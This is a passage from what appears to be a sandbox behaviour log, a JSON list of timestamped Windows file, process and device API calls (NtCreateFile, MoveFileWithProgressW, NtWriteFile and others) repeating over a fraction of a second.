"NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,619", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:53,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:53,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,689", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:53,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,759", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,769", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,800", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,800", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:53,810", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,810", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,820", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:53,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,830", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,840", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,860", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,870", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,870", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:53,870", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,880", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,890", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": 